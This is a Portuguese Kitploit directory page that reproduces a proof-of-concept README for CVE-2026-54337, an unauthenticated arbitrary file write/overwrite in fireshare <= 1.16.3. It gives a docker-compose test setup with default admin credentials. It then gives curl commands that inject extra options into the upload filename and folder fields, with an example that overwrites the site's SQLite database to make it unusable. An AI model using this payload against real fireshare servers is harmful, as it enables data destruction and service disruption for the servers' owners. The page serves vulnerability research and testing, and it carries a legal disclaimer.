Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-54337-PoC — CVE-2026-54337 - PoC de Escrita/Sobrescrição de Arquivo Não Autenticada para fireshare <= 1.16.3 | Kitploit
Ferramentas/GitHubGitHub/4qu4r1um/cve-2026-54337-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e Educação
GitHub4qu4r1um/cve-2026-54337-poc

CVE-2026-54337-PoC

CVE-2026-54337 - PoC de Escrita/Sobrescrição de Arquivo Não Autenticada para fireshare <= 1.16.3

Ver Repositório
2há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-54337 PoC

CVE-2026-54337 - Escrita/Sobrescrita de Arquivo Não Autenticada em fireshare <= 1.16.3 PoC

Para mais informações, consulte este aviso do GitHub

Configuração

  • Use o seguinte docker-compose.yml para testar
root@kitploit:~
services:
  fireshare:
    container_name: fireshare-temp
    image: shaneisrael/fireshare:1.6.13-lite

    ports:
      - "8082:80"

    # Ephemeral storage (discarded when container stops)
    tmpfs:
      - /data
      - /processed
      - /videos
      - /images

    environment:
      - ADMIN_USERNAME=admin
      - ADMIN_PASSWORD=admin123
      - SECRET_KEY=fireshare-super-secret-random-key
      - DOMAIN=
      - PUID=1000
      - PGID=1000

    restart: unless-stopped

Exploração

  • Passo 1: Crie qualquer arquivo, desde que o nome tenha a extensão .mp4, por exemplo
root@kitploit:~
$ echo 123 > test.mp4
  • Passo 2: Execute o seguinte comando curl (certifique-se de alterar o placeholder
root@kitploit:~
$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=<FILE TO OVERWRITE/WRITE> -select_streams v.mp4" \
  -F "folder=testfolder -o <DIRECTORY TO PUT THE FILE>" \
  http://<URL>/api/upload/public

Por exemplo, para sobrescrever /data/db.sqlite, você alterará o comando da seguinte forma

root@kitploit:~
$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=db.sqlite -select_streams v.mp4" \
  -F "folder=testfolder -o data" \
  http://<URL>/api/upload/public

Nota

  • Uma vez que, por padrão, o serviço é executado sob o usuário nginx, que só tem acesso a /data, /processed, /images e /videos, portanto você só pode escrever/sobrescrever lá
  • Por isso, na minha opinião, sobrescrever /data/db.sqlite tem o maior impacto, pois tornará o site inutilizável

Aviso Legal

  • Esta prova de conceito (PoC) é fornecida apenas para fins educacionais, de pesquisa e de segurança defensiva.
  • O autor não se responsabiliza por qualquer uso indevido, dano, acesso não autorizado, interrupção de serviço, perda de dados ou consequências legais resultantes do uso deste código. Os usuários são os únicos responsáveis por garantir que cumprem todas as leis, regulamentos e requisitos de autorização aplicáveis antes de usar esta PoC.
  • Esta PoC deve ser executada apenas contra sistemas para os quais você tenha permissão explícita para testar. Testes não autorizados de sistemas podem ser ilegais e antiéticos.
  • Ao usar este software, você reconhece que o faz por sua própria conta e risco.
Baixar ferramenta